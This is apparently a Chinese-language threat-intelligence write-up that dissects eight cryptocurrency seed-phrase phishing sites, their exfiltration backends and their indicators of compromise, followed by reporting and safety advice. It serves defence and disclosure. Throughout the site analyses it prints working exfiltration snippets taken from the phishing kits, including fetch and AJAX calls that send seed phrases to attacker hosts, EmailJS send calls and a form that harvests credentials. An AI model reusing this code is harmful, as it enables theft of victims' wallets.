加密货币网络钓鱼的剖析:
8起真实攻击事件剖析
我们拦截了实时钓鱼流量,对5款助记词窃取工具进行了逆向工程分析,并将被盗数据追踪至Telegram机器人、EmailJS账户以及“钓鱼即服务”(Phishing-as-a-Service)后端。

我们的发现
每天,都有成千上万的加密货币用户因误入与正规钱包服务毫无二致的钓鱼网站而损失资金。但接下来会发生什么呢 后面 那个虚假的“Connect Wallet”按钮?你的助记词到底被存到了哪里?
我们拦截了来自 5 个活跃钓鱼网站的实时 HTTP 流量,下载了它们的完整源代码,并追踪了每个数据外泄端点的最终目的地。此次调查揭示了现代加密货币钓鱼攻击的完整运作机制——从诱使你输入助记词的社会工程学伎俩,到将助记词实时发送给攻击者的 Telegram 机器人。
本文中显示的所有助记词均为随机生成的测试数据。在本次调查过程中,未泄露任何真实的凭据。所有相关网站均已向其各自的托管服务商和滥用处理部门进行了举报。
通用攻击模式
尽管品牌和后端各不相同,但这8个钓鱼网站都遵循了 完全相同的心理漏斗:
关键洞察:“正在连接...”动画总是 注定会失败. 在第4个网站的源代码中,我们发现 const success = false — 没有尝试连接钱包。整个流程的存在,纯粹是为了引导受害者进入“手动连接”表单。

8个站点:详细分析
冒充
一个用于钱包验证的虚构“去中心化协议”。该协议采用CryptoCompare的实时价格行情显示,并链接至真实的区块链浏览器(以太坊、BSC、Polygon、Avalanche、Solana、Cardano),以增强可信度。 该登录页面展示了100多个钱包徽标,并设有3步“验证”流程。
双重外泄链
这5个系统中后端架构最为复杂——每一条被盗的凭据都会通过 两个独立通道 同时:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) OSINT调查结果
| 指标 | 值 |
|---|---|
| 诈骗邮件 | Bestgrace309@gmail.com |
| Telegram 机器人 | @DewdropsTG_bot(ID:7567323692) |
| Telegram 收件人 | @metatech2(聊天ID:7350941887) |
| 后端 | emailjs-backend-ovtg.onrender.com |
| EmailJS 服务 | service_d5qigxs / template_7bqxeaa |
| 隐藏领域 | layerschain.in(源自 CF 电子邮件混淆处理) |
| 已发送的消息 | 1,824+(来自 Telegram 的 message_id) |
| 域名年龄 | 2天(TLS:2026年3月25日) |
攻击者的电子邮件是在一个 JavaScript 注释 内部 config.js: // Bestgrace309@gmail.com。他们在部署前忘记将其移除了。此外,Telegram 中继后端完全开放——既无身份验证,也无速率限制。通过解码 Cloudflare 的 data-cfemail 在 HTML 中经过混淆处理后,我们还发现了一封隐藏的电子邮件: support@layerschain.in,连接至印度和南非的托管基础设施。
冒充
对现实的像素级精准还原 Aqualibre (AQLA) 令牌迁移页面。该 HTML 包含一个元数据标签,其中披露了来源: data-scrapbook-source="https://token.aqla.app/migration",时间戳为2024年11月19日。
零代码方法
该攻击者需要 零服务器端代码. 该 表单直接提交至 非静态 — 这是静态网站的一种合法表单后端。每条 提交的信息都会被转发到诈骗者的邮箱。攻击者的 邮箱是 在源代码中永远不会显示.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages:免费。Un-static Forms:免费。未购买 域名。未租用服务器。基础设施总成本: 零美元.
冒充
该子域名包含“safpal" — 这是 对 SafePal,一款 广受欢迎的硬件钱包。该网站伪装成“区块链钱包 问题反馈”平台,设有26个虚假问题分类。利用Typed.js实现 区块链名称(以太坊、BSC、Polygon……)的动态展示,并使用 LiveCoinWatch行情滚动条来增强可信度。
相同的装备,相同的操作员?
使用 完全相同的网络钓鱼模板 作为第2号站点:
完全相同 connect.html, 完全相同 wallets.html 包含 60 多个徽标,使用相同的 Un-static 后端(表单 ID 不同—— 6f1b82c3...da9943af). 该套件完全相同,这强烈表明 由一名操作员同时负责这两个站点.
代码中的错误提示:“Privay Policy”(缺失一个“c”)、“seperated”(应为“separated”)、“Kestore”(缺失一个“y”)。密码字段使用 type="text" 而不是 type="password".
冒充
几乎是该产品的完美复刻版 Flare Network portal —— 一个真正的第1层EVM区块链,支持FTSO和Data Connector协议。复制了30多家生态系统合作伙伴、导航功能和品牌形象。网站图标从一个域名抢注网站加载而来: portal.flaremainet.com (“mainnet”中少了一个“n”)。
EmailJS 双重冗余
唯一使用 同时使用两个独立的 EmailJS 账户 用于防止关停冗余:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) 每起盗窃案的电子邮件主题: "New Wallet Details from Flare".
该 HTML 包含 Google 标签管理器 (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC 保护功能,以及一个 Twitter/X 广告像素. 攻击者正在运行 付费广告 旨在将受害者引导至钓鱼网站,并过滤掉机器人点击。这绝非业余爱好——而是一项由资金支持的运作,配备了数据分析工具并投入了广告费用。

冒充
一款通用的“COIN NODE”/“Wallet Fix”服务(无具体品牌)。版权所有“Wallet Fix 2022”——该套件模板至少已有4年历史。图片托管于 pumpeth.com (AWS 上的 WordPress)。
钓鱼即服务
最令人担忧的后端架构:一个 基于 UUID 的多租户 API:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... 每个诈骗者都会获得一个专属的 UUID 端点。一名中央操作员负责维护该 API、追踪诈骗活动,并可能从被盗资金中抽取分成。这就是 工业化规模的加密货币盗窃 — 一种“钓鱼即服务”(Phishing-as-a-Service)模式。
相关基础设施(基本已废弃)
| 域名 | 角色 | 状态 |
|---|---|---|
| api.pulseresolve.com | 数据外泄 API | NXDOMAIN |
| walletissuesfix.net | 网站图标托管 | NXDOMAIN |
| syncwallet.online | Logo 主持人 | NXDOMAIN |
| pumpeth.com | 图片 CDN | 已上线(AWS) |
后端已经崩溃了,但 前端仍处于运行状态 在 Cloudflare Pages 上。如果攻击者重新注册 pulseresolve.com, 网站随即恢复运行。
冒充
A 双管齐下的行动:位于 wallet-support-39n.pages.dev 包含15个虚假发行类别和39个钱包品牌,此外还有 像素级还原的 Ledger 入门指南克隆版 在 ledger-recovery.support 托管在 Replit 上——包含设备型号选择、PIN 设置以及一个包含 24 个单词的助记词网格,其中 真正的 BIP39 自动补全.
反扫描器 C2 后端
该钱包支持页面会将被盗数据发送至 api.uranustoken.org/log — 一个部署在 Cloudflare 后端的自定义 nginx/Ubuntu C2 服务器。后端 有意丢弃所有 GET 请求 (返回 522 超时错误),仅响应 POST 请求。这意味着 URL 扫描器、Google Safe Browsing 爬虫以及使用 GET 请求向该端点发送探测的安全研究人员都无法获取任何信息——该 C2 似乎已失效。
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} 该 Ledger 克隆项目在 Replit 平台上运行着一个独立的 Express.js 后端: POST /api/recovery-phrase 收集 {deviceId, pin, phrase}. 它返回 400 {"error":"Invalid data provided"} 对于格式错误的输入——确认后端是否 已上线并正在积极验证中 被盗数据。
OSINT调查结果
| 指标 | 值 |
|---|---|
| 前端(钱包) | wallet-support-39n.pages.dev |
| 前端(Ledger) | ledger-recovery.support (34.111.179.208) |
| C2 后端 | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| C2 IP地址 | 104.21.60.163 / 172.67.198.35(Cloudflare) |
| Replit 验证 | a43d3852-5304-47af-a61b-f0f6f3912736 |
| 注册处 | Name.com (ledger-recovery.support) |
| 已部署 | 2026年1月9日(Last-Modified标头) |
| 技术栈 | React + Vite + Tailwind v4.1 + Framer Motion |
这个 466 KB 的 JS 打包文件包含 完整的 BIP39 词表 在实时自动完成功能中,“密码短语”一词出现67次,“助记词”出现39次。这款Ledger克隆设备引导受害者完成的入门流程与真正的Ledger设备完全一致——这是整个调查中最具说服力的钓鱼页面。该 apiKey 配置中的该字段建议 多租户 PhaaS 架构.
冒充
一个通用的“去中心化发售平台”,具有 21种饵料类别 (质押、迁移、KYC、赠品活动、领取奖励、资产恢复、预售、铸造NFT、被锁定的账户……)以及 70多个钱包品牌 ——这是我们见过的最全面的钱包列表之一。那个显而易见的拼写错误“Sychronize”(少了一个“n”),暴露了这是假的。
FormSubmit Pipeline
用途 FormSubmit.co — 一项正规的表单转邮件服务。端点哈希 a2cf4131f1a5d39453c7c183df96f86f 这是诈骗者电子邮件地址的MD5值。我们对Gmail、Yahoo、Hotmail、ProtonMail、Yandex和Mail.ru上的数百种电子邮件地址模式进行了暴力破解—— 未找到匹配项. 诈骗者使用的是一个不常见的或随机生成的电子邮件地址。
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); OSINT调查结果
| 指标 | 值 |
|---|---|
| 域名 | mainnetvalidationapp.pages.dev |
| 表单提交哈希值 | a2cf4131f1a5d39453c7c183df96f86f |
| 活动 ID | DAPP 去中心化 |
| FontAwesome 工具包 | bdc3291137(套件编号 #112310842,免费版 v6.7.2) |
| jQuery | 3.2.1 与 3.5.1 同时加载 |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1(版本不匹配) |
FontAwesome 工具包 bdc3291137 — FontAwesome 可以识别出该套件 ID 背后的账户所有者。活动标签 DAPP DECENTRALIZED 可能会出现在使用相同 FormSubmit 哈希值的其他钓鱼网站上。在窃取助记词后,一个 虚假二维码和随机生成的7位参考码 显示的内容是:“请向管理员提供您的唯一参考代码”——这只是让受害者继续等待,而非展开调查。
冒充
未知——前端和后端均已离线。根据有效载荷结构判断,这是一款加密钱包助记词窃取器。该 Cloudflare R2 公共存储桶 (对象存储,而非 Pages)是一种 有充分记录的网络钓鱼攻击途径 据Netskope报告,已识别出5,000多个恶意网页,流量增长了61倍。
“脚本小子”的配置
最 基本操作 在此集合中。助记词会被发送 逐字 指向运行在家庭电脑或VPS上的PHP脚本,该脚本通过免费的动态DNS进行访问:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access OSINT调查结果
| 指标 | 值 |
|---|---|
| 前端 | pub-519769e9eb634616b1746c2018641d56.r2.dev [离线] |
| 后端 | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| R2 桶 ID | 519769e9eb634616b1746c2018641d56 |
| DDNS 服务商 | DNSExit.com / Netdorm, Inc.(俄亥俄州辛辛那提市) |
| DNS NS | ns10–13.dnsexit.com |
| 用户名 | mercifuljigga4real123(简体中文(大陆)) |
“Merciful” + “jigga”(Jay-Z的昵称) + “4real” + “123”——一个极具个人特色的昵称,暗示着对嘻哈文化的热爱。 未找到 在任何被收录的平台:GitHub、X、Instagram、TikTok、Reddit、YouTube、Twitch 或 Steam。很可能以该名称或类似名称活跃于 Discord、Telegram 或游戏平台。文件名 fuc.php 与把手那不拘一格的风格相得益彰。
窃取你的助记词的7种方法

| 方法 | 网站 | 工作原理 | 速度 | 成本 |
|---|---|---|---|---|
| Telegram 机器人 | #1 | Render.com 上的 Express.js 会将请求转发至 Bot API。诈骗者会立即收到包含凭据的私信。 | 实时 | $0 |
| EmailJS | #1, #4 | 客户端 JavaScript 会直接将数据发送至 EmailJS API,该 API 随后将数据转发至诈骗者的邮箱。 | 约1分钟 | $0 |
| 非静态表单 | #2, #3 | 向一个合法的表单服务发送标准的 HTML 表单 POST 请求,该服务会通过电子邮件转发提交的内容。 | 约1分钟 | $0 |
| FormSubmit.co | #7 | 通过 jQuery AJAX 发送至 FormSubmit.co。电子邮件地址被 MD5 哈希值隐藏。该活动标记为“DAPP DECENTRALIZED”。 | 约1分钟 | $0 |
| 自定义 C2 API | #6 | React 单页应用(SPA)将请求发送至位于 Cloudflare 后端的 nginx/Express API。 丢弃 GET 请求 (522) 以躲避扫描器。仅响应 POST 请求。 | 实时 | 约$5/月 |
| PHP + DDNS | #8 | 通过免费动态DNS(publicvm.com)在家庭电脑上运行的PHP脚本。助记词按单词逐一发送。 | 实时 | $0 |
| PhaaS API | #5 | 基于 UUID 的多租户 API。中央运营商管理后端,诈骗者租用端点。 | 实时 | 未知 |
揭露所有网络钓鱼网站的7个警示信号
如果你看到 任何 如果遇到以下情况,请立即关闭该标签页:
真正的钱包连接会使用 WalletConnect 协议或浏览器扩展程序。它们绝不会显示要求您输入助记词的“连接失败”错误提示。
每个钱包图标都会跳转到同一个表单。真正的服务应该集成每个钱包的实际SDK。
提交后出现的虚假“503 错误”或“未知错误”是蓄意为之。你的数据早已被盗——该错误旨在诱骗你使用另一个钱包再次尝试。
这5个网站均滥用了Cloudflare Pages的免费套餐。无需身份验证。2025年,Cloudflare Pages上的网络钓鱼滥用行为增加了198%。
没有任何合法服务需要这三种凭证类型。这种三栏表单是钓鱼工具包的典型特征。
这些网站都无法加载 ethers.js, web3.js,也不会发起任何 RPC 调用。它们只是伪装成去中心化应用(dApp)的纯 HTML 表单。
免费托管 + 免费表单服务 + 免费消息发送 = 零成本的完整网络钓鱼操作。如果网站没有真正的域名,就要提高警惕。
完整的IOC表格
致安全团队、威胁情报平台及滥用行为举报人:
域名与基础设施
| 域名 | 类型 | 状态 |
|---|---|---|
| networklayers.pages.dev | 网络钓鱼前端 | 直播 |
| token-aqla.pages.dev | 网络钓鱼前端 | 直播 |
| antiresolve-mysafpalnode.pages.dev | 网络钓鱼前端 | 直播 |
| flaremainnet.pages.dev | 网络钓鱼前端 | 直播 |
| swiftauthapps.pages.dev | 网络钓鱼前端 | 直播 |
| emailjs-backend-ovtg.onrender.com | TG 继电器后端 | 直播 |
| portal.flaremainet.com | 错拼域名资产 | 未知 |
| layerschain.in | 相关领域 | DNS 故障 |
| api.pulseresolve.com | PhaaS 后端 | NXDOMAIN |
| walletissuesfix.net | 资产托管方 | NXDOMAIN |
| syncwallet.online | Logo 主持人 | NXDOMAIN |
| pumpeth.com | 图片 CDN | 已上线(AWS) |
| wallet-support-39n.pages.dev | 网络钓鱼前端 | 直播 |
| ledger-recovery.support | Ledger 钓鱼攻击(Replit) | 直播 |
| api.uranustoken.org | C2 后端(nginx/Ubuntu) | 直播 |
| uranustoken.org | 根域 | 404 |
| mainnetvalidationapp.pages.dev | 网络钓鱼前端 | 直播 |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | 网络钓鱼(R2 存储桶) | 离线 |
| mercifuljigga4real123.publicvm.com | PHP 后端(DDNS) | NXDOMAIN |
账户与标识符
| 类型 | 值 | 网站 |
|---|---|---|
| 电子邮件 | Bestgrace309@gmail.com | #1 |
| 电子邮件(隐藏) | support@layerschain.in | #1 |
| Telegram 机器人 | @DewdropsTG_bot (7567323692) | #1 |
| Telegram 用户 | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| 非静态表单 | c78173e2d991...94c3f76 | #2 |
| 非静态表单 | 6f1b82c3ce55...da9943af | #3 |
| PhaaS UUID | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| 渲染实例 | rndr-id:ed83576e-b1b3-4c82 | #1 |
| Replit 验证 | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| 表单提交 MD5 | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| 活动标签 | DAPP 去中心化 | #7 |
| FontAwesome 工具包 | bdc3291137(套件编号 #112310842) | #7 |
| R2 桶 ID | 519769e9eb634616b1746c2018641d56 | #8 |
| 用户名/DDNS | mercifuljigga4real123(简体中文(大陆)) | #8 |
在哪里举报加密货币钓鱼诈骗

| 服务 | 应报告的内容 | 如何 |
|---|---|---|
| Cloudflare | 7个 .pages.dev 存储桶 + 1个 R2 存储桶 | abuse.cloudflare.com |
| Google Safe Browsing | 所有钓鱼网址 | 举报网络钓鱼 |
| PhishTank | 社区黑名单的所有网址 | phishtank.org |
| EmailJS | 3个被滥用的账户(服务ID见上文) | abuse@emailjs.com |
| 非静态 | 2 个表单端点 | 通过 un-static.com 联系 |
| Render.com | Telegram 中继后端 | 渲染滥用表单 |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| 谷歌(Gmail) | Bestgrace309@gmail.com | Google 滥用行为举报 |
| Twitter/X | 推广网站#4的广告账户 | X 广告滥用举报 |
| FormSubmit.co | 哈希值 a2cf4131... (#7) | FormSubmit 滥用表单 |
| Replit | ledger-recovery.support (#6) | Replit 滥用报告 |
| Name.com | ledger-recovery.support 的注册商 | Name.com 滥用 |
| DNSExit | mercifuljigga4real123.publicvm.com | dnsexit.com 滥用 |
| FontAwesome | 套件 bdc3291137(#7) | FontAwesome 的滥用 |
| Chainabuse | 所有网络钓鱼活动 | Chainabuse.com |
如何保护自己
任何正规的服务都不会要求您在网站上输入助记词。 助记词仅应在钱包恢复过程中输入到官方钱包软件中——切勿在第三方“验证”、“同步”或“恢复”网站上输入。
在连接任何钱包之前:
- 请确认网址与官方域名一致。请检查 SSL 证书的详细信息。
- 真正的 WalletConnect 采用二维码或深度链接——绝不会以助记词的形式出现。
- 如果出现“连接失败”并要求您手动输入凭据——这就是网络钓鱼。
- 在以下位置检查可疑网址: PhishTank 或 VirusTotal 在进行交互之前。
- 使用硬件钱包——它要求对每笔交易进行物理确认。
- 将官方网址添加到书签。切勿点击广告、私信或社交媒体中的链接。
加密货币网络钓鱼分类法
种子短语窃取者只是其中一类。以下是加密货币网络钓鱼的完整全景图——我们将针对每种类型进行深入剖析。
令人不适的真相
开展一次加密货币网络钓鱼行动的成本 $0 并采取 30分钟以内. 免费托管、免费表单服务、免费消息机器人。网站#1背后的攻击者已经从 1,824+名受害者. 第4号站点正在运行 付费广告 扩大规模。这可不是业余玩意儿——这是一个产业。唯一的防御就是提高警惕。
帮助我们反击
PhishDestroy 实时追踪并报告加密货币钓鱼网站。如果您遇到可疑网站,请向我们举报——我们将进行调查并努力将其关闭。



